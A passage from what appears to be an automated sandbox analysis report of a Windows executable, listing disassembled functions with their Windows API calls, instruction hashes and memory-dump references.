                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: d06ff6913d7d4a7f505967b5e738494a41e1b5b90e52a114298945a2097037f3
                                • Instruction ID: 5ca91e1e9e6b00c74d6803720fd72b38e6891812c5ea5c8f22cebe7d758c4693
                                • Opcode Fuzzy Hash: d06ff6913d7d4a7f505967b5e738494a41e1b5b90e52a114298945a2097037f3
                                • Instruction Fuzzy Hash: C731D7B1A50119ABCB61FF68EC51BED73B5BF49300F0004ADFA0697250DE309E848F94
                                Function 006C4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 006C4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006C44AD
                                • CloseHandle.KERNEL32(00000000), ref: 006C44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C44E7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 06d196593ec148f2b495ed2a90334936263dcb1fc4ce4f91064293ddc9e9a102
                                • Instruction ID: aea4e845673077b9bb6f2a6188b73bd13ccfe764fa2e58b0f090663662dfb0ad
                                • Opcode Fuzzy Hash: 06d196593ec148f2b495ed2a90334936263dcb1fc4ce4f91064293ddc9e9a102
                                • Instruction Fuzzy Hash: 68F0FCB09026256BE720EB749C49FFABBE9FF14704F144595FA89D7280DFB48C848B90
                                Function 006C8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 006C8FDD
                                  • Part of subcall function 006C87FF: __amsg_exit.LIBCMT ref: 006C880F
                                • __getptd.LIBCMT ref: 006C8FF4
                                • __amsg_exit.LIBCMT ref: 006C9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 006C9026
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 01a42a314458c77f64d00579ab9b2d64c538931915f64c59e04eb2ac0dcb5e13
                                • Instruction ID: 96f705703d6be9a6444b954697a9e6d35eb75c1c2cff9d01b7fd638a955dd163
                                • Opcode Fuzzy Hash: 01a42a314458c77f64d00579ab9b2d64c538931915f64c59e04eb2ac0dcb5e13
                                • Instruction Fuzzy Hash: 56F09632A096109BD7A1BB78680AF7D33A3EF00711F25421EF5556B2D2DF645900EA6E
                                Function 006C7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,006A5BEB), ref: 006C731B
                                • lstrcpy.KERNEL32(00000000), ref: 006C733F
                                • lstrcat.KERNEL32(?,------), ref: 006C7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: b6bf159a03e7c5c4837219e791cd5100db5955c7be5366b99f1b40e0f708f44f
                                • Instruction ID: 989201bc59bf24b55693707363c350711afaa312fabb74d40084657deb87f165
                                • Opcode Fuzzy Hash: b6bf159a03e7c5c4837219e791cd5100db5955c7be5366b99f1b40e0f708f44f
                                • Instruction Fuzzy Hash: 26F0A5745117429FDB65AF36DC48A26BBFAEF85B01318892EA8DAC7714EB34D8409F10
                                Function 006B33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3497
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 69679076c241ff88c1fd36da4a5b04fb6bf860791e6d35cb286540c4be3ac675
                                • Instruction ID: 67e514c8e40ba1c22d7cdbad76c9c55764e26575b934f26c4c9172de925d7490
                                • Opcode Fuzzy Hash: 69679076c241ff88c1fd36da4a5b04fb6bf860791e6d35cb286540c4be3ac675
                                • Instruction Fuzzy Hash: E0120EB0B112218FDB28CF19C554BA5B7E6BF44714B19C1AED809CB3A2D776ED82CB44
                                Function 006B7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7CAF
                                  • Part of subcall function 006B7D40: std::_Xinvalid_argument.LIBCPMT ref: 006B7D58
                                  • Part of subcall function 006B7D40: std::_Xinvalid_argument.LIBCPMT ref: 006B7D76
                                  • Part of subcall function 006B7D40: std::_Xinvalid_argument.LIBCPMT ref: 006B7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 8717abf4bf546a92b87e21ded92315885d0a0902d754601c2f14164c7f451835
                                • Instruction ID: 6e48c7c210b91c4f4ff748dd0c921db18e32470788896a2d9ddd389f90e88253
                                • Opcode Fuzzy Hash: 8717abf4bf546a92b87e21ded92315885d0a0902d754601c2f14164c7f451835
                                • Instruction Fuzzy Hash: 3B31B8B23086144FD7249E6CE8809EAFBE7DFD1750B20466EF5458B741D7719CC18398
                                Function 006A6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 006A6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 51dee3b1ee002a6f7bb36d17f0bfc75064dbcbdd2db686169869479b89a0a883
                                • Instruction ID: d635df6fdfc77b6bce347cd604623529dedc13eabc7e6fca5bb852d6b549ad3e
                                • Opcode Fuzzy Hash: 51dee3b1ee002a6f7bb36d17f0bfc75064dbcbdd2db686169869479b89a0a883
                                • Instruction Fuzzy Hash: E7216FB16006019FDB209F20DC84BB673EAEB41705F484978F996CB685EB75ED45CB50
                                Function 006C2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C244C
                                • lstrlen.KERNEL32(00000000), ref: 006C24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2570
                                • lstrlen.KERNEL32(00000000), ref: 006C2577
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: fe82443ef00c0a81f25a3d5b4dc9805b2d3d6b2d937d4f28780daa3767e671a3
                                • Instruction ID: 1532420b041bab2862120e3ecd5dd33e5f87122d81bdb2cf144a006a64d1c5bc
                                • Opcode Fuzzy Hash: fe82443ef00c0a81f25a3d5b4dc9805b2d3d6b2d937d4f28780daa3767e671a3
                                • Instruction Fuzzy Hash: 8F81A1B1E002069BDB14DF99D864BAEB7B6FF84300F18816DE908A7381EB759D45CB94
                                Function 006C1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006C15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1649
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: b2a9f0f2ef596ca75f1e486c4636fe6260dd305e4f8829ab0a3b46ea45ac947b
                                • Instruction ID: c4b30ece5c2ad04be747773af80d95b8b080cf5267efa60895d7223ae50a0a22
                                • Opcode Fuzzy Hash: b2a9f0f2ef596ca75f1e486c4636fe6260dd305e4f8829ab0a3b46ea45ac947b
                                • Instruction Fuzzy Hash: F221DAB4611B029BD725EF2AD454B27B7E6FF46700B444A1DA49ACBB41EB34E841CF90
                                Function 006A1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000), ref: 006A162D
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A164F
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A1671
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 29e1bd4bb016fc9d7e575d4666a3365e4e77cfd6795df7d8ea863369355ca0f8
                                • Instruction ID: a83008f81f4569a0488f0a599241d960ef831deca1cb32898900893fcab3959b
                                • Opcode Fuzzy Hash: 29e1bd4bb016fc9d7e575d4666a3365e4e77cfd6795df7d8ea863369355ca0f8
                                • Instruction Fuzzy Hash: 1331A6B4A11B029FC764EF3AC558956B7E5BF4A705B04492EA896C7B10DB34F811CF90
                                Function 006A1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006A162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1693
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
